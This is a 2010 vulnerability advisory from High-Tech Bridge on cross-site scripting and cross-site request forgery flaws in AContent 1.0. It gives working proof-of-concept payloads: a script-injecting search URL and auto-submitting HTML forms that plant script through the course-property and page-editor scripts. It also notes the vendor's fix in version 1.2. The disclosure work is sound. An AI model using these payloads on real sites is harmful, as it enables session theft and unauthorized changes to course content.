Total Tests:

Multiple Vulnerabilities in AContent

Advisory ID:HTB22596
Product:AContent
Vendor:Inclusive Design Institute
Vulnerable Versions:1.0 and probably prior
Tested Version:1.0
Advisory Publication:September 1, 2010 [without technical details]
Vendor Notification:September 1, 2010
Public Disclosure:September 15, 2010
Latest Update:September 9, 2010
Vulnerability Type:Cross-Site Scripting [CWE-79]
Cross-Site Request Forgery [CWE-352]
Risk Level:Medium
CVSSv2 Base Scores:4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
4 (AV:N/AC:H/Au:N/C:N/I:P/A:P)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in AContent which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerabilities in AContent
1.1 The vulnerability exists due to input sanitation error in the "search_text" parameter in home/search.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://host/home/search.php?search_text=txt"><script>alert(document.cookie)< /script>&catid=&search=S earch
1.2 The vulnerability exists due to input sanitation error in the "copyright" parameter in home/course/course_property.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in and has access to course properties.
Exploitation example:
<form action="http://host/home/course/course_property.php?_course_id=COURSE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="COURSE_ID" />
<input type="hidden" name="title" value="Creating Lesson in AContent" />
<input type="hidden" name="category_id" value="0" />
<input type="hidden" name="pri_lang" value="en" />
<input type="hidden" name="description" value="Learn how to" />
<input type="hidden" name="copyright" value='1"><script>alert(document.cookie)</script>' />
<input type="submit" name="submit" id="sbmtit" value="Save" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>


2) Cross-site request forgery in AContent
The vulnerability exists due to insufficient validation of the request origin in home/editor/edit_content.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify pages. It is also possible to store and execute arbitrary HTML and script code due to a input sanitation error in the “body_text” HTTP POST parameter. Successful exploitation requires that victim has access to manage courses.
Exploitation example:
<form action="http://host/home/editor/edit_content.php?_cid=PAGE_ID" method="post" name="main" enctype="multipart/form-data" >
<input type="hidden" name="_course_id" value="54" />
<input type="hidden" name="_cid" value="PAGE_ID" />
<input type="hidden" name="title" value="page title" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="pid" value="0" />
<input type="hidden" name="alternatives" value="" />
<input type="hidden" name="current_tab" value="0" />
<input type="hidden" name="keywords" value="" />
<input type="hidden" name="test_message" value="" />
<input type="submit" name="submit" id="sbmtit" value="Save" />
<input type="hidden" name="displayhead" value="0" />
<input type="hidden" name="displaypaste" value="0" />
<input type="hidden" name="complexeditor" value="1" />
<input type="hidden" name="title" value="atest ah" />
<input type="hidden" name="formatting" value="1" />
<input type="hidden" name="head" value="" />
<input type="hidden" name="uploadedfile_paste" value="" />
<input type="hidden" name="body_text" value='hello world html<script>alert(document.cookie)</script>' />
<input type="hidden" name="weblink_text" value="" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

How to Detect Cross-Site Scripting Vulnerabilities
Website Security Test
  • GDPR & PCI DSS Test
  • Website CMS Security Test
  • CSP & HTTP Headers Check
  • WordPress & Drupal Scanning
Try For Free

Solution:
Upgrade to AContent 1.2:
http://sourceforge.net/projects/acontent/files/AContent-1.2.tar.gz/download
http://sourceforge.net/news/?group_id=342183&id=303982


References:
[1] High-Tech Bridge Advisory HTB22596 - https://www.immuniweb.com/advisory/HTB22596 - Multiple Vulnerabilities in AContent
[2] AContent - http://atutor.ca/acontent/ - AContent is an open source learning content authoring system and respository used to create interoperable, accessible, adaptive Web-based learning content.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Close
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Email:
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
*
*
*
Your data will stay private and confidential